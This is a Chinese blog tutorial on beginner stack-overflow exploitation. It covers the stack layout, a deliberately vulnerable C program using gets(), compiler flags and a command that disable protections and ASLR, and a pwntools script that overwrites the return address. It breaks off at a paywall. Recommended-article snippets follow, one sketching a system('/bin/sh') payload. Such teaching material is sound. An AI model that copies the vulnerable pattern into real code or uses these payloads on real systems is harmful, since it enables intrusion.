【Web狗自虐系列1】Pwn入门之初级ROP

最新推荐文章于 2025-06-27 17:44:08 发布
最新推荐文章于 2025-06-27 17:44:08 发布
阅读量1k 收藏 19
点赞数 4
CC 4.0 BY-SA版权
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/AngleWithShotgun/article/details/131577450

0x0 栈介绍

栈式一种典型的后进先出的数据结构,其操作主要有压栈(push)与出栈(pop)两种操作
压栈与出栈都是操作的栈顶
image.png
高级语言在运行时都会被转换为汇编程序,在汇编程序运行过程中,充分利用了这一数据结构。每个程序在运行时都有虚拟地址空间,其中某一部分就是该程序对应的栈,用于保存函数调用信息和局部变量。
程序的栈是从进程地址空间的高地址向低地址增长的。

  • x86
    • 函数参数在函数返回地址的上方
  • x64
    • 前6个整型或指针参数一次保存在RDI,RSI,RDX,RCX,R8和R9寄存器中,如果还有更多的参数的话才会保存在栈上
    • 内存地址不能大于0x00007FFFFFFFFFFF,6个字节长度,否则会抛出异常

0x1 栈溢出原理

栈溢出指的是程序向栈中某个变量写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变。
栈溢出的基本前提是:

  • 程序必须向栈上写入数据
  • 写入的数据大小没有被良好地控制

一、简单示例

最典型的栈溢出利用是覆盖程序的返回地址为攻击者所控制的地址,在利用前,我们需要确保这个地址所在的段具有可执行权限,举例

#include <stdio.h>
#include <string.h>
void success() {
   
    puts("You Hava already controlled it."); }
void vulnerable() {
   
   
  char s[12];
  gets(s);
  puts(s);
  return;
}
int main(int argc, char **argv) {
   
   
  vulnerable();
  return 0;
}

这个程序的主要目的读取一个字符串,并将其输出。最终我们想要做到的事可以控制程序执行success函数
使用如下指令对其进行编译

gcc -m32 -fno-stack-protector -no-pie stack_example.c -o stack_example
  • -m32 生成32位程序
  • -fno-stack-protector不开启堆栈溢出保护,即不生成canary
  • --enable-default-pie参数代表PIE默认已开启,需要在编译指令中添加参数-no-pie

Linux平台下还有地址空间分布随机化(ASLR)的机制,简单来说即使可执行文件开启了PIE保护,还需要系统开启ASLR才回真正打乱基址,否则程序运行时依旧会加载一个固定的基址上,可以通过修改/proc/sys/kernel/randomize_va_space来控制ASLR启动与否,具体选项有:

  • 0,关闭ASLR,没有随机化。栈、堆、.so的基地址每次都相同
  • 1,普通ASLR。栈基地址、mmap基地址、.so加载基地址都将被随机化,但是堆基地址没有随机化
  • 2,增强的 ASLR,在1的基础上,增加了堆基地址随机化
    修改指令:关闭Linux系统的ASLR
echo 0 > /proc/sys/kernel/randomize_va_space

image.png
根据分析可知,该字符串距离ebp的长度为0x14,对应的栈结构为

			+--------------------+
			|      retaddr       |
			+--------------------+
			|      saved ebp     |
	ebp---->+--------------------+
			|                    |
			|                    |
			|                    |
			|                    |
			|                    |
			|                    |
s,ebp-0x14->+--------------------+

通过Ghidra获得success的地址,其地址为0x080491ba
image.png

tips
push ebp是一个函数的开始标志

如果读取的字符串为

0x14*'a' + 'bbbb' + success_addr

由于gets会读到回车才算结束,所以可以直接读取所有字符串,并将saved ebp覆盖为bbbb,将retaddr覆盖为success_addr,此时的栈结构为

			+--------------------+
			|     0x080491ba     |
			+--------------------+
			|        bbbb        |
	ebp---->+--------------------+
			|                    |
			|                    |
			|                    |
			|                    |
			|                    |
			|                    |
s,ebp-0x14->+--------------------+

由于在计算机内存中,每个值都是按照字节存储的。一般情况下都是采用小端存储,即0x080491ba在内存中的形式是

\xba\x91\x04\x08

所以构造exp如下

##coding=utf8
# 导入pwn模块
from pwn import *
# 构造与程序交互的对象
sh = process('./01')
# 所要运行的函数的地址
success_addr = 0x080491ba
# code为构造的填充脏字节
code = 'a' * 0x14
# place为填充寄存器的字节
place = 'b' * 0x4
# 拼接payload
payload = code + place + p32(success_addr)
# 打印payload
print(p32(success_addr))
# 发送payload
sh.sendline(payload)
# 将代码交互转换为手工交互
sh.interactive()

执行成功运行vulnerable函数
总结:栈溢出中比较重要的两个步骤分别为

  1. 寻找危险函数(常见危险函数如下)
    1. 输入
      1. gets,直接读取一行,忽略\x00
      2. scanf<
最低0.47元/天 解锁文章

200万优质内容无限畅学
pwn入门
FSD
02-23 500
作者:Tangerine@SAINTSEC 本系列的最后一篇 感谢各位看客的支持 感谢原作者的付出 一直以来都有读者向笔者咨询教程系列问题,奈何该系列并非笔者所写[笔者仅为代发]且笔者功底薄弱,故无法解答,望见谅 如有关于该系列教程的疑问建议联系论坛的原作者ID:Tangerine 0x00 got表、plt表与延迟绑定 在之前的章节中,我们无数次提到过got表和plt表这两个结构。这两个表有什么不同?为什么调用函数要经过这两个表?ret2dl-resolve与这些内容又有什么关系呢?本节我们将通
ROP入门教程
Sakura给爷pwn全场
10-18 759
【技术分享】ropasaurusrex:ROP入门教程——STACK: https://www.anquanke.com/post/id/86190 【技术分享】ropasaurusrex:ROP入门教程——DEP(上): https://anquanke.com/post/id/86196 【技术分享】ropasaurusrex:ROP入门教程——DEP(下): https://www.anquanke.com/post/id/86197 ...
【二进制安全】PWN基础入门大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_0011的博客
06-27 711
PWN是一个黑客之间使用的词语,通常指攻破设备或系统。发音类似“砰”,对黑客而言,这象征着成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被操纵了。在网络安全语境中,PWN通常指的是通过不同的攻击手段如利用漏洞、进行社会工程学攻击等方法成功地获得了一个设备、系统或网络的未授权控制权。一旦攻击者“PWN了”一个系统,他们就可以执行各种恶意活动,如窃取数据、安装恶意软件或制造更广泛的破坏。
pwn-ROP
aitangdao4981的博客
05-23 295
首先对目标文件checksec,提示NX enabled,看看其解释 NX/DEP(堆栈不可执行) NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。 打开qira调试一下,报segmentation fa...
一个简单的例子入门pwn
阿龙丶的博客
09-13 1321
首先,pwn大概是pwn to own的意思,就是通过二进制/系统调用等方式获得目标主机的shell; 我直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令; 所需要的工具安装等,可以先看这个链接(https://blog.youkuaiyun.com/qq_40827990/article/details/83217716) 例子下载地址:https://download.youkuaiyun.com/download/qq_40827990/10740077 https://..
pwn入门1
weixin_44954083的博客
02-09 537
知识点主要是:缓冲区溢出缓冲区溢出的利用方式return to dl resolve 堆溢出off by one 格式化字符串漏洞 需要用到的程序是gdb、gdb-peda、gcc、python、pwntools、socat、rp++、readelf 缓冲区溢出简介:(栈) ps:这个图方便大家理解栈的结构 可以看出这个函数的有一个参数和两个局部变量,因为局部变量和参数会放在函数的栈帧上而且这个栈...
pwn零基础入门
weixin_45948183的博客
03-24 1万+
pwn零基础入门 很多初学者在初学pwn的时候,对pwn可能存在许多疑问,学什么,怎么学,今天和大家分享一下刚学pwn的一些资料的学习历程。 首先分享一下pwn的一系列学习资料 一、首先语言基础得打牢,1、汇编语言,《汇编语言—王爽》2、编程语言(C语言和python)C语言必须要会,题目大部分是用C语言写的,而且很多那些知识都要读libc的源代码。会python,exp用python写的,CTF...
信息安全PWN入门指导
07-18
信息安全PWN入门指导:用于CTF的入门PWN的学习,是入门指导。
PWN入门(从零开始学习PWN
devil8123665的博客
09-17 4735
https://www.zhihu.com/people/Jwizard/posts https://www.jianshu.com/p/187b810e78d2
PWN-入门基础
工作学习笔记
05-27 5747
简单介绍四个方面的内容:一是什么是PWN、二是做PWN所需知识储备、三是基于Ubuntu搭建PWN环境、四是在公网上练习PWN题。
pwn 入门基础
y0un9er
08-10 4704
简单介绍入门 pwn 所需要的基础知识,如:汇编、函数调用约定、常用工具等
Rop快速入门1
分开_旅行的博客
09-17 1228
1.什么是rop:                        rop是rapid open platform (快速开放平台)的缩写,常见的rop框架就是淘宝的开放平台,随着互联网发展的升温,越来越多的公司选择搭建属于自己公司的开放平台,微信开放平台,微博开放平台...... 2.rop的整体框架:                              rop的重点在应用层,无论
pwn(究极入门
热门推荐
sjt670994562的博客
08-01 1万+
不能说是逆向转pwn吧,主要是想拓展一下,这两者之间的关系也挺大的 1.攻防世界-when_did_you_born 除去连上就有flag,这个应该就是最简单的题目了吧 惯例,checksec,这里有四种保护机制,有大佬的链接,这个要弄很清楚,尤其是PIE,以后慢慢来吧 https://www.jianshu.com/p/8a9ef7205632 没有PIE和FORTIFY(这边作者也不是太懂,...
攻防世界base除4_攻防世界pwn新手训练
weixin_36310597的博客
12-24 656
小白刚开始接触pwn,做点新手训练了解一下pwn是干啥的。一开始啥漏洞都不知道,很多都是看别人的wp才知道要干嘛,比如才知道原来printf函数也是有漏洞的。 把这些题的思路和做法记录下来,不然我这鱼的记忆肯定过几天就又忘了get_shell题目描述:运行就能拿到shell呢,真的如题,nc连接,连接直接就是shell,直接cat flag就可以了。CGfsb题目描述:菜鸡面对着pringf发愁,...
buuctf pwn入门
04-01
### BUUCTF PWN 入门教程与解题方法 #### 一、PWN题目概述 PWN是一种CTF竞赛中的常见类别,主要涉及程序漏洞利用技术。BUUCTF平台提供了丰富的PWN练习题,适合初学者学习并掌握基本的漏洞挖掘和利用技巧[^1]。 #### 二、工具准备 在解决BUUCTF上的PWN题目之前,需要准备好必要的环境和工具: - **操作系统**: 推荐使用Ubuntu或Kali Linux作为实验环境。 - **编程语言**: Python是最常用的脚本编写语言,尤其是`pwntools`库可以极大简化payload生成和交互过程[^4]。 - **调试器**: 使用GDB进行动态分析,配合PEDA插件增强功能[^2]。 - **静态分析工具**: `checksec`用于查看目标可执行文件的安全特性设置情况。 #### 三、典型解题流程 以下是针对BUUCTF上简单PWN题目的通用解决方案框架: ##### 1. 静态分析 通过`file`命令确认目标文件类型及其架构;运用`strings`查找可能存在的敏感字符串;借助`readelf`, `objdump`等进一步了解ELF结构细节以及是否存在保护机制如NX, ASLR等[^3]。 ```bash $ file pwn1 $ strings pwn1 | grep win $ checksec pwn1 ``` ##### 2. 动态调试 启动GDB加载待测程序,在可疑位置设断点观察寄存器状态变化及内存布局状况。如果存在栈溢出,则尝试定位返回地址被覆盖的具体偏移量。 ```python from pwn import * context.log_level='debug' io = process('./pwn1') gdb.attach(io,"b *0x4011a6\nc") io.recvuntil('>') io.sendline(cyclic(1024)) io.wait() core = io.corefile stack = core.rsp offset = cyclic_find(stack) print(f"Offset is {offset}") ``` ##### 3. 构造Payload 基于前面获得的信息设计合适的载荷数据包送入服务端触发预期行为完成Flag获取操作。 ```python payload = flat({ offset: [ next(u.search(b'/bin/sh\x00')), elf.symbols['system'] ] }) p.sendlineafter('> ', payload) p.interactive() ``` 以上仅为理论模型展示,请根据实际遇到的不同类型的挑战灵活调整策略。 #### 四、注意事项 - 学习过程中注重理解原理而非机械模仿现有代码片段。 - 多加实践积累经验,逐步深入探索更复杂的攻击手法比如ROP链构造等等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ShadowCui

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值